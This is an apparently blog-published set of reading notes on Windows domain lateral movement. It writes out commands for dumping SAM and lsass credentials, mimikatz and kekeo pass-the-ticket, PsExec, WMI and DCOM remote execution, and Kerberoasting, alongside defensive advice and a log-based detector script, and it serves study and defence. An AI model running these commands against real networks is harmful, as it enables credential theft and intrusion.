"Intranet Security Offense and Defense: A Practical Guide to Penetration Testing" Reading Notes (5): Analysis and Defense of Lateral Movement in the Domain

Foreword

In this article I continue reading and studying "Intranet Security Offense and Defense: A Practical Guide to Penetration Testing". This chapter systematically introduces the main methods of lateral movement within a domain, reproduces and analyzes the most important and classic vulnerabilities found in intranet domain environments, and gives the corresponding preventive measures.

This chapter includes:

  • Analysis of common remote connection methods
  • Understanding the NTLM protocol from a cryptographic perspective
  • Principles of PTT and PTH
  • How to use PsExec, WMI, smbexec for lateral movement
  • Authentication process of Kerberos protocol
  • Windows Authentication Hardening Solution
  • Exchange Mail Server Penetration Testing

I have also covered some of this before: Intranet penetration series: Summary of lateral penetration methods

1. Common Windows Remote Connections and Commands

1. IPC

IPC (Internet Process Connection) is a named pipe opened for inter-process communication

  • The corresponding permissions are obtained by authenticating with a user name and password
  • A connection to the target machine can be established through ipc$, and that connection can then be used to run commands on the target machine

Create an ipc$ connection:

net use \\192.168.1.10\ipc$ "admin123" /user:administrator

(1) Conditions of use

  • Ports 139 and 445 are open
  • The administrator has left the default shares enabled

(2) Reasons for connection failure

  • Wrong user name or password
  • The target does not have the ipc$ default share enabled
  • Ports 139 and 445 on the target cannot be reached
  • Incorrect command syntax

2. Built-in Windows tools

(1) dir

After establishing an ipc$ connection to the remote target with net use, the dir command can list the files on the remote host:

dir \\192.168.1.10\c$

(2) tasklist

After establishing an ipc$ connection to the remote target with net use, the tasklist command can list the processes running on the remote host:

tasklist /S 192.168.1.10 /U administrator /P admin123

3. Scheduled tasks

(1) at

The scheduled task command used before Windows Server 2008:

:: create a scheduled task that runs shell.bat at the given time
at \\192.168.1.10 4:11PM C:\shell.bat
:: creation returns a task ID; specifying that ID deletes the task
at \\192.168.1.10 7 /delete

(2) schtasks

The scheduled task command used from Windows Server 2008 onward:

:: run at startup
schtasks /create /s 192.168.1.10 /tn test /sc onstart /tr C:\calc.bat /ru system /f
:: run the task now
schtasks /run /s 192.168.1.10 /i /tn "test"
:: delete the task
schtasks /delete /s 192.168.1.10 /tn "test" /f

2. Obtaining Windows System Hashes

1. LM Hash and NTLM Hash

Windows has two methods of hashing plaintext passwords:

  • LM Hash: "LAN Manager Hash", which is essentially DES encryption with a hard-coded key, limited to 14 characters (padded with zeros if shorter). Disabled by default since Windows Vista and Windows Server 2008; when disabled, the LM hash field holds the fixed value aad3b435b51404eeaad3b435b51404ee (meaning empty or disabled)
  • NTLM Hash: "New Technology LM Hash", based on MD4, used from Windows Vista and Windows Server 2003 onward

Hashes can be cracked using online databases, rainbow tables, etc., or used directly for lateral movement via PTH (Pass the Hash)

2. Grabbing passwords on a single machine

Tools can export hash values and plaintext passwords from the memory of the lsass.exe process or from the SAM file

  • Local user names, hash values and other security verification information are stored in the SAM file, located at C:\Windows\System32\config. This file cannot be copied while Windows is running, but it can be copied after booting a PE system from a USB drive
  • The lsass.exe process implements Windows' local security policy and logon policy

To grab hashed or plaintext passwords on Windows, privileges must first be elevated to System

(1) Grabbing

Export the SAM and SYSTEM hives, then read the hashes from the files with mimikatz or Cain:

reg save hklm\sam sam.hive
reg save hklm\system system.hive

Use Task Manager or Microsoft's Procdump to dump the lsass process to lsass.dmp, then use mimikatz to extract the hashes from the memory dump

Procdump download address: https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

Some tools:

  • GetPassword
  • PwDump7
  • QuarksPwDump
  • mimikatz
  • PowerShell

(2) Prevention

Windows Server 2012 turns off WDigest by default, so attackers can no longer obtain plaintext passwords from memory

On versions below 2012, installing the KB2871997 patch has the same effect

The status of WDigest can be viewed and modified in the registry; the command-line toggles for enabling and disabling it are shown in the following screenshot

[screenshot: enabling and disabling WDigest from the command line]

3. Hashcat

Hashcat only supports CPU cracking; oclHashcat supports GPU cracking (AMD, NVIDIA). They can crack Windows passwords, Linux passwords, Office passwords, Wi-Fi passwords, MySQL passwords, SQL Server passwords, and passwords hashed with mainstream algorithms such as MD5, SHA1 and SHA256

Download address: https://github.com/hashcat/hashcat

4. Prevention

Precautions:

  • Windows Server 2012 R2 added a new group called Protected Users. As long as the users who need protection are placed in this group, attackers cannot use tools such as mimikatz to grab their plaintext passwords and hash values.

  • Install the KB2871997 patch, which Microsoft released to address remote access via PsExec or IPC (c$): local accounts are no longer allowed to access the computer remotely, with the exception of the local administrator account with SID 500 (the default Administrator)

  • Microsoft added the WDigest protocol in Windows XP, which makes Windows store plaintext passwords in memory to simplify logon to the local computer. Modify the registry so that it no longer does this

  • The Debug privilege determines which users can attach a debugger to any process or to the kernel; by default only Administrator has it. mimikatz requires the Debug privilege when grabbing hashed or plaintext passwords (because it needs to interact with the lsass process). Remove Administrator from the Debug privilege

3. Pass-the-Hash Attack

Pass-the-Hash (PTH) attack:

  • In a domain environment, users mostly log on to computers with domain accounts, and a large number of computers are given the same local administrator account and password during installation.
  • Therefore, if a computer's local administrator account and password are the same as on other machines, an attacker can use pass-the-hash to log on to those other computers in the intranet.

Put simply, tools pass the hash value to other computers to get through authentication, thereby gaining control of the remote computers.

In actual testing, after the KB2871997 update the conventional pass-the-hash method can no longer be used for lateral movement, except with the Administrator account (SID 500): that account's hash can still be passed. It should be emphasized that this is the account whose SID is 500 (renaming the Administrator account does not change its SID)

4. Pass-the-Ticket Attack

Pass the Ticket (PTT) does not require local administrator privileges

1. mimikatz

// export tickets
mimikatz "privilege::debug" "sekurlsa::tickets /export"
// purge the tickets held in memory
mimikatz # kerberos::purge
// inject a ticket into memory
mimikatz "kerberos::ptt" "C:\ticket\<ticket file name>"

2. kekeo

kekeo needs the domain name, user name and NTLM hash together to generate a ticket

Download address: https://github.com/gentilkiwi/kekeo

// generate a ticket
kekeo "tgt::ask /user:administrator /domain:test.com /ntlm:<ntlm hash>"
// purge the other tickets held in memory
kekeo # kerberos::purge
// import into memory
kerberos::ptt <ticket file name>

3. Prevention

A few points:

  • When using the dir command, a hostname must be used (using an IP address causes an error)
  • A ticket file injected into memory is valid for 10 hours by default
  • Pass-the-ticket does not require local administrator privileges on the target machine

5. PsExec

PsExec is a tool in Microsoft's official PsTools toolkit

  • It was originally intended for operating and maintaining large numbers of Windows hosts, and works very well in a domain environment.
  • With PsExec, you can execute commands on a remote computer or elevate from administrator to System privileges to run a specified program
  • Can be used on Windows Server 2016 and earlier
  • Download address: https://download.sysinternals.com/files/PSTools.zip

The basic principle of PsExec is to create a psexec service on the remote target computer through a named pipe, writing a binary named "PSEXECSVC" to the target's disk, run the command through that service, and delete the service once the operation completes.

It requires the admin$ share to be enabled on the remote system (it is enabled by default) and generates a lot of logs

:: get a System-privilege shell (ipc$ already established); without -s you get an administrator shell
PsExec.exe -accepteula \\192.168.1.10 -s cmd.exe
:: if there is no ipc$ connection
PsExec.exe \\192.168.1.10 -u administrator -p 123456 cmd.exe

6. WMI

WMI (Windows Management Instrumentation) is a set of integrated management tools

  • Supported since Windows 98
  • Computer systems can be managed locally or remotely
  • Windows does not log WMI operations by default, so using wmiexec for lateral movement leaves no record in the logs

1. Basic commands

Basic usage:

wmic /node:192.168.1.10 /user:administrator /password:admin123 process call create "cmd.exe /c ipconfig > ip.txt"

wmic remotely executes commands and starts the Windows Management Instrumentation service on the remote system (the target needs port 135 open, and wmic executes commands on the remote system with administrator privileges). If the server has a firewall enabled, wmic cannot connect. In addition, since wmic commands return no output, you can redirect the command result to a file and read it through ipc$ with type. If wmic is used to run a malicious program, it leaves no log

2. Other tools

(1) wmiexec in impacket

impacket can be installed in Kali

  • After a successful connection there is an interactive command line
  • Mainly used for Linux -> Windows

wmiexec.py administrator:[email protected]

(2) wmiexec.vbs

wmiexec.vbs calls WMI through VBS to simulate the function of PsExec (it has long been flagged and blocked by antivirus)

:: interactive shell
cscript.exe //nologo wmiexec.vbs /shell 192.168.1.10 administrator admin123
:: execute a single command
cscript.exe wmiexec.vbs /cmd 192.168.1.10 administrator admin123 "ipconfig"

(3) Invoke-WMICommand

Invoke-WMICommand is a script in PowerSploit that invokes WMI via PowerShell to execute commands remotely

# target user name
$user = "test\administrator"
# target password
$password = ConvertTo-SecureString -String "admin123" -AsPlainText -Force
# combine into a credential object
$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user, $password
# execute remotely
$remote = Invoke-WmiCommand -Payload { ipconfig } -Credential $Cred -ComputerName 192.168.1.10
# output
$remote.PayloadOutput

(4) Invoke-WMIMethod

Invoke-WMIMethod is built into PowerShell

# target user name
$user = "test\administrator"
# target password
$password = ConvertTo-SecureString -String "admin123" -AsPlainText -Force
# combine into a credential object
$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user, $password
# execute remotely
Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "ipconfig" -ComputerName "192.168.1.10" -Credential $Cred

7. smbexec

smbexec can execute commands on remote systems via file shares (admin$, c$, ipc$, d$)

Download link:

How to use:

8. Using DCOM on Remote Systems

DCOM (Distributed Component Object Model) is a set of Microsoft concepts and program interfaces

  • It is based on the Component Object Model (COM); COM provides a set of interfaces that allow clients and servers on the same computer to communicate (Windows 95 and later)
  • A client program object can send requests to a server program object on another computer in the network

The execution process is always the same:

  • Connect to the remote computer via ipc$
  • Execute the command

1. Execute commands through local DCOM

Get a list of DCOM applications:

# Get-CimInstance is only available from PowerShell 3.0, i.e. Server 2012 and later
Get-CimInstance Win32_DCOMApplication
# on PowerShell 2.0 the following command can be used instead
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplication

2. Use DCOM to execute commands on a remote machine

(1) Call MMC20.Application to execute commands remotely

net use \\192.168.1.10 "admin123" /user:test\xiaom
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.1.10"))
$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c cmd.exe","")

(2) Call 9BA05972-F6A8-11CF-A442-00A0C90A8F39

$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"192.168.1.10")
$obj = [System.Activator]::CreateInstance($com)
$item = $obj.item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0)

For details on this method, see: https://bbs.pediy.com/thread-226540-1.htm
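As an added example (not from the book or the original post), here is a small detector run over constructed event records to show what the PsExec, WMI and DCOM methods above leave behind when the relevant auditing is on. It assumes: PsExec installs a service (System log, event 7045) named PSEXESVC; remote WMI process creation (Security log, event 4688, which requires process-creation auditing to be enabled) shows WmiPrvSE.exe as the parent; MMC20.Application runs its command as a child of mmc.exe; the flattened JSON field names are this example's own.

```python
import json

# Constructed sample events, one JSON object per line (not real logs).
SAMPLE_EVENTS = r"""
{"log":"System","id":7045,"host":"ws02","service":"PSEXESVC","image":"%SystemRoot%\\PSEXESVC.exe"}
{"log":"Security","id":4688,"host":"ws02","new_process":"C:\\Windows\\System32\\cmd.exe","parent":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"}
{"log":"Security","id":4688,"host":"ws03","new_process":"C:\\Windows\\System32\\cmd.exe","parent":"C:\\Windows\\System32\\mmc.exe"}
{"log":"Security","id":4688,"host":"ws03","new_process":"C:\\Windows\\explorer.exe","parent":"C:\\Windows\\System32\\userinit.exe"}
{"log":"System","id":7045,"host":"srv01","service":"Spooler","image":"C:\\Windows\\System32\\spoolsv.exe"}
"""


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict):
    """Return (technique, reason) for an event matching a lateral-movement trace, else None."""
    if event.get("id") == 7045:
        # PsExec drops and registers its PSEXESVC service on the target.
        name = event.get("service", "").lower()
        image = _basename(event.get("image", ""))
        if "psexesvc" in name or "psexesvc" in image:
            return ("PsExec", f"service {event['service']} installed from {event['image']}")
    if event.get("id") == 4688:
        parent = _basename(event.get("parent", ""))
        child = _basename(event.get("new_process", ""))
        # wmic / wmiexec "process call create" runs under the WMI provider host.
        if parent == "wmiprvse.exe":
            return ("WMI remote execution", f"{child} spawned by WmiPrvSE.exe")
        # MMC20.Application ExecuteShellCommand launches the child from mmc.exe.
        if parent == "mmc.exe" and child in ("cmd.exe", "powershell.exe"):
            return ("DCOM MMC20.Application", f"{child} spawned by mmc.exe")
    return None


def scan(lines: str) -> list:
    """Parse JSON-lines events and return [(host, technique, reason), ...] for every hit."""
    hits = []
    for line in lines.strip().splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        verdict = classify(event)
        if verdict:
            hits.append((event.get("host"), verdict[0], verdict[1]))
    return hits


if __name__ == "__main__":
    for host, technique, reason in scan(SAMPLE_EVENTS):
        print(f"{host}: {technique}: {reason}")
```

Event 4688 is only written when process-creation auditing is turned on, which is why the text above says WMI execution leaves no log by default.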

9. Using SPNs in a Domain Environment

Service Principal Name (SPN):

  • A large number of applications contain a variety of resources
  • Each resource is assigned a different SPN

1. SPN scanning

Because every server in a domain environment must register its SPNs with the Kerberos authentication service, an attacker can simply send a query to the domain controller to obtain the SPN of the service they need, and thereby learn which machine hosts that service resource.

Also known as "scanning Kerberos service instance names", SPN scanning is the best way to discover services in Active Directory. Compared with network port scanning, the main feature of SPN scanning is that it does not need to connect to every IP address in the network to check service ports (so it does not trigger the rules of intranet IPS, IDS and similar devices and generate large numbers of alert logs). Because the SPN query is part of normal Kerberos ticket behaviour, it is harder to detect.

The PowerShell-AD-Recon toolkit provides a series of services together with the mapping between each service's logon account and the host running the service. Download address: https://github.com/PyroTek3/PowerShell-AD-Recon

SPNs are queried from the domain controller over LDAP, so an attacker can scan SPNs as soon as they hold the privileges of an ordinary domain user.

2. Kerberoast attack

Download address: https://github.com/nidem/kerberoast

For details, please refer to: Intranet Penetration | SPN and Kerberoast Attack Explanation

Also related is the article Understanding Golden Tickets and Silver Tickets

Defense:

  • Make sure service account passwords are longer than 25 characters
  • Ensure passwords are random (avoid reusing the same password)
  • Change passwords regularly

10. Exchange Mail Server Security

Email may contain large amounts of source code, the corporate internal address book, plaintext passwords, sensitive business logon addresses, and VPN account passwords that allow access to the internal network from outside.

Exchange can be operated locally or remotely through PowerShell.

Mailbox server, Client Access server and Hub Transport server are the core roles. As long as these three roles are deployed, basic email processing is available, and all three can be deployed on the same host.

Mail sending uses a single protocol, SMTP (Simple Mail Transfer Protocol); mail receiving uses several protocol standards, such as POP3, which evolved from POP (Post Office Protocol), and the more widely used IMAP (Internet Mail Access Protocol). Exchange also developed its own proprietary MAPI protocol for receiving mail

Access interfaces and protocols supported by Exchange:

  • OWA (Outlook Web App): the web mailbox provided by Exchange
  • EAC (Exchange Administrative Center): the Exchange administration back end
  • Outlook Anywhere (RPC-over-HTTP, RPC/HTTP)
  • MAPI (MAPI-over-HTTP, MAPI/HTTP)
  • Exchange ActiveSync (EAS, XML/HTTP)
  • Exchange Web Services (EWS, SOAP-over-HTTP)

Exchange service discovery:

  • Port-scan based discovery (nmap)
  • SPN lookup (Exchange registers SPNs in AD when it is installed)

The Exchange database has the suffix ".edb" and is stored on the Exchange server. PowerShell can be used to view the corresponding information

Exchange mail files have the suffix ".pst"

UNC (Universal Naming Convention): a network path of the form \\hostname\sharename or \\ip_address\sharename is a UNC path, where sharename is the network share name

View the mail database:

# the Exchange snap-in must be loaded before querying
Add-PSSnapin microsoft.exchange*
Get-MailboxDatabase -Server "Exchange1"
Get-MailboxDatabase -Identity 'Mailbox Database 1894576043' | Format-List Name,EdbFilePath,LogFolderPath

Epilogue

Some classic lateral movement methods, many of which are already detected and blocked

Source: blog.csdn.net/weixin_44604541/article/details/124146818